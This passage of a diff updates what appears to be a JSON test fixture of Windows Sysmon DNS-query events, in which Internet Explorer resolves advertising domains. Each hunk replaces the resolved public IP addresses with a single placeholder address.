Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1459,7 +1459,7 @@ "ProcessId": "2736", "QueryName": "pagead2.googlesyndication.com", "QueryStatus": "0", - "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;", + "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -1479,7 +1479,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "process": { @@ -1508,7 +1508,7 @@ "ProcessId": "2736", "QueryName": "googleads.g.doubleclick.net", "QueryStatus": "0", - "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;" + "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;" } } }, @@ -1518,7 +1518,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:52.22.184.73;::ffff:54.152.30.174;::ffff:3.213.70.197;::ffff:54.158.57.141;::ffff:52.6.39.34;::ffff:52.0.113.251;::ffff:3.213.8.28;::ffff:3.215.246.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1534,7 +1534,7 @@ "ProcessId": "2736", "QueryName": "pixel.advertising.com", "QueryStatus": "0", - "QueryResults": "type: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:52.22.184.73;::ffff:54.152.30.174;::ffff:3.213.70.197;::ffff:54.158.57.141;::ffff:52.6.39.34;::ffff:52.0.113.251;::ffff:3.213.8.28;::ffff:3.215.246.105;", + "QueryResults": "type: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.841" }, @@ -1560,7 +1560,7 @@ "event_data": { "QueryName": "onevideosync.uplynk.com", "QueryStatus": "0", - "QueryResults": "type: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:54.210.214.197;::ffff:52.202.202.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.844", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1589,7 +1589,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:54.210.214.197;::ffff:52.202.202.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "log": { @@ -1642,7 +1642,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:50.116.194.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", @@ -1660,7 +1660,7 @@ "ProcessId": "2736", "QueryName": "ad.turn.com", "QueryStatus": "0", - "QueryResults": "type: 5 ad.turn.com.akadns.net;::ffff:50.116.194.21;", + "QueryResults": "type: 5 ad.turn.com.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.956", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -1683,7 +1683,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:34.225.20.218;::ffff:3.216.14.125;::ffff:52.200.28.150;::ffff:3.216.103.132;::ffff:52.4.86.222;::ffff:52.21.200.160;::ffff:3.216.249.238;::ffff:3.94.175.146;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -1700,7 +1700,7 @@ "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "level": "information", "event_data": { - "QueryResults": "type: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:34.225.20.218;::ffff:3.216.14.125;::ffff:52.200.28.150;::ffff:3.216.103.132;::ffff:52.4.86.222;::ffff:52.21.200.160;::ffff:3.216.249.238;::ffff:3.94.175.146;", + "QueryResults": "type: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.005", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1723,7 +1723,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:34.237.248.89;::ffff:35.153.21.25;::ffff:52.200.238.112;::ffff:52.206.93.38;::ffff:34.227.35.137;::ffff:35.169.96.208;::ffff:52.22.206.42;::ffff:52.201.81.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity 